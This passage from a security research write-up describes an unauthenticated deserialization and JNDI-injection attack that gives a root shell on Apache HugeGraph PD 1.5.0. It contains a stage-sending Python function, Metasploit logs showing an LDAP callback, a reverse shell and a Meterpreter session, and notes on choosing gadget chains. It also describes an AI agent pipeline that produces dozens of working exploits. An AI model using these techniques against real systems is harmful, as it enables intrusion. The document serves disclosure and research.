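def run_stages(build_frame, host, port=8610):
    # Each stage rides its own SOFABolt frame. Every response comes back as
    # SERVER_DESERIAL_EXCEPTION because the side effect fires before the
    # terminating ClassCastException - on this wire, the "error" is success.
    for class_name, method_name, args in STAGES:
        with socket.create_connection((host, port), timeout=10) as s:
            s.sendall(build_frame(class_name, method_name, args))
            s.recv(4096)
```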

[*] Stage 1: Setting trustSerialData=true via ProxyLazyValue...
[*] Stage 2: Setting enableUnsafeSerialization=true via ProxyLazyValue...
[*] Stage 3: Triggering JNDI lookup -> ldap://172.18.0.3:1389/dc=drkqrx,dc=ozw
[+] JNDI callback received, delivering CommonsBeanutils1 payload...
[*] Command shell session 1 opened (172.18.0.3:4444 -> 172.18.0.2:57928)
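The "side effect first, exception second" ordering is plain JDK behavior: TreeMap compares keys during insertion, so anything a compareTo() does executes before any ClassCastException it raises. The class and property names below are illustrative stand-ins, not the real ProxyLazyValue/RdnEntry gadget:

```java
import java.util.TreeMap;

public class SideEffectBeforeException {
    // Hypothetical stand-in for the gadget element: comparing it performs the
    // side effect, then the rest of the chain dies with a ClassCastException.
    static class EffectfulKey implements Comparable<Object> {
        public int compareTo(Object other) {
            System.setProperty("demo.side.effect", "fired"); // side effect runs first...
            throw new ClassCastException("chain type mismatch"); // ...then the chain dies
        }
    }

    public static void main(String[] args) {
        TreeMap<Object, Object> map = new TreeMap<>();
        try {
            // TreeMap.put() compares the key on insertion -> side effect, then CCE.
            map.put(new EffectfulKey(), "a");
        } catch (ClassCastException expected) {
            // The "server" reports a deserialization failure here...
        }
        // ...but the damage is already done:
        System.out.println("property: " + System.getProperty("demo.side.effect"));
    }
}
```

The server-side stack trace honestly reports a failed deserialization; it just reports it one method call too late.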

No special JVM flags. No preconditions. Just network access to port 8610.

The Last Gotcha

Except it didn’t work. Not the first time.

We spent an embarrassing amount of time debugging a silent failure. All three stages fired. The JNDI callback arrived at our LDAP server. The serialized payload was delivered. And… nothing. No command execution. No execve in strace output. The CommonsCollections1 chain was being deserialized and silently dying somewhere inside the JVM.

We checked the BER encoding. Correct. We checked the LDAP response format. Correct. We added both JVM flags manually to the Docker container - trustSerialData=true and enableUnsafeSerialization=true - set at startup, no race conditions possible. Still nothing.

This is the kind of bug that makes you question your understanding of Java deserialization at a fundamental level. Everything was right. The payload was right. The delivery was right. The properties were right. And it just… didn’t work.

The answer, when we finally found it, was one of those facts that experienced Java security researchers know in their bones but that never quite makes it into the ysoserial README:

CommonsCollections1 is broken on JDK 9+.

CC1’s entry gadget is AnnotationInvocationHandler.readObject(). In early JDK 8, this method iterates over the attacker-supplied map and triggers the chain through Map.entrySet(). Starting with JDK 8u71 (JDK-8076413) - and in every release of JDK 9 and later - Oracle rewrote the method to rebuild the member map from the raw serialized fields into a fresh LinkedHashMap. The proxy-based interception that makes the chain work simply doesn’t fire anymore. The object deserializes successfully, quietly does nothing, and gets garbage collected. No exception. No error. No indication that anything went wrong.
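Why the rewrite kills the chain comes down to dynamic proxies: the gadget only fires if readObject() invokes a method on the attacker's proxied map. The sketch below models both behaviors with a plain java.lang.reflect.Proxy - it is an illustration of the mechanism, not the actual JDK source:

```java
import java.lang.reflect.Proxy;
import java.util.ArrayList;
import java.util.Collections;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

public class ProxyInterceptionDemo {
    public static void main(String[] args) {
        List<String> intercepted = new ArrayList<>();

        // Attacker-controlled Map proxy: every method call reaches the
        // InvocationHandler - in CC1, this is where the Transformer chain fires.
        @SuppressWarnings("unchecked")
        Map<String, Object> attackerMap = (Map<String, Object>) Proxy.newProxyInstance(
            Map.class.getClassLoader(), new Class<?>[]{Map.class},
            (proxy, method, margs) -> {
                intercepted.add(method.getName());
                return method.getName().equals("entrySet")
                    ? Collections.emptySet() : null;
            });

        // Old behavior (modeled): readObject() called entrySet() on the
        // proxied member map, handing control to the attacker's handler.
        attackerMap.entrySet();
        System.out.println("intercepted: " + intercepted);

        // Patched behavior (modeled): readObject() rebuilds the map from raw
        // serialized fields into a fresh LinkedHashMap and never invokes a
        // method on the attacker's object - the handler stays silent.
        Map<String, Object> defensiveCopy = new LinkedHashMap<>();
        defensiveCopy.put("value", "x"); // stands in for GetField-based rebuild
        defensiveCopy.entrySet();
        System.out.println("intercepted after defensive copy: " + intercepted);
    }
}
```

Same bytes on the wire, same successful deserialization - the handler just never gets a method call to hijack, which is why the failure is completely silent.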

We’d been debugging a payload that was fundamentally incapable of executing on our target. All the property-setting, all the LDAP delivery, all the BER encoding work - correct. The chain itself was the one thing we never questioned, because CommonsCollections1 is the “default” Java deserialization chain. It’s the one everyone reaches for first. And on JDK 11, it’s a no-op.

The fix was one line: switch from CommonsCollections1 to CommonsBeanutils1.

CB1 uses PriorityQueue → BeanComparator → TemplatesImpl - no AnnotationInvocationHandler anywhere in the chain. Works on every JDK version from 7 through 21. Doesn’t even need enableUnsafeSerialization because it doesn’t touch InvokerTransformer. The target has commons-beanutils-1.9.4.jar on the classpath. One line change, and:

[*] Started reverse TCP handler on 172.18.0.3:4444
[*] Stage 1: Setting trustSerialData=true via ProxyLazyValue...
[*] Stage 2: Setting enableUnsafeSerialization=true via ProxyLazyValue...
[*] Stage 3: Triggering JNDI lookup -> ldap://172.18.0.3:1389/dc=drkqrx,dc=ozw
[+] JNDI callback received, delivering CommonsBeanutils1 payload...
[*] Command shell session 1 opened (172.18.0.3:4444 -> 172.18.0.2:57928)

Root shell. No JVM flags. No preconditions. Unauthenticated, from the network, against a stock Apache HugeGraph PD 1.5.0 deployment.

The Meterpreter target works too:

[*] Sending stage (3045380 bytes) to 172.18.0.2
[*] Meterpreter session 1 opened (172.18.0.3:4444 -> 172.18.0.2:59678)

Module number sixteen. Our first Java deserialization + JNDI injection module. And a reminder that “known” gadget chains have expiration dates that nobody bothers to print on the label.

What’s Next

We’re still not fixing the turn logging. We’ve decided it adds mystique. (We’re fixing the turn logging.)

We’re also looking at what it would take to handle binary protocols more reliably. The agent solved this one through brute persistence and creative debugging, but we’d rather see it solve it in one context window instead of three. That probably means giving it better tooling for protocol reverse engineering - hex dump analysis, pattern matching against known protocol families, automated decompilation pipelines.

The exploit, the lab, the Metasploit module, and the full writeup are on GitHub:

Fifty-seven CVEs. Fifty-seven working exploits. Sixteen Metasploit modules. One “failure” that taught us more than the other fifty-six combined.

The pipeline keeps running. Some days it makes coffee-break exploits. Some days it makes you sit and watch. And some days, it does ninety percent of the work and leaves you the last ten percent - the ten percent that reminds you why you got into this in the first place.


CVEForge Series: